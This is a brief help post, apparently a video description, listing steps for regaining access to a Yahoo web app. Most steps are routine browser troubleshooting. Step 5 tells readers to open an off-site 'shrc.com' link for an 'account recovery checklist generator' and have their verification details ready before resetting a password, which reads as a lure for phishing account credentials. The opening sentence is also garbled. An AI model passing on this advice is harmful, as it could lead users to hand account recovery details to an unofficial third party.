I hit this issue today, then hit us the quick fix that solved it. If you're having trouble accessing your Yahoo web app, follow these steps to get back in. Step 1. Check your internet connection. Make sure your device is connected to the internet. A weak or unstable connection can cause access issues. Step 2. Clear browser cache. Go to your browser settings and clear the cache and cookies. This can resolve issues caused by outdated files. Step 3. Disable browser extensions. Some extensions may interfere with Yahoo's functionality. Temporarily disable them to see if that resolves the issue. Step 4. Update your browser. Ensure your web browser is up to date. An outdated browser may not support the latest features of the Yahoo web app. Step 5. Reset your password. Before starting recovery, use the shrc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Remember, if you encounter a message about too many failed login attempts, you might need to wait a bit before trying again. I hope these steps help you regain access smoothly.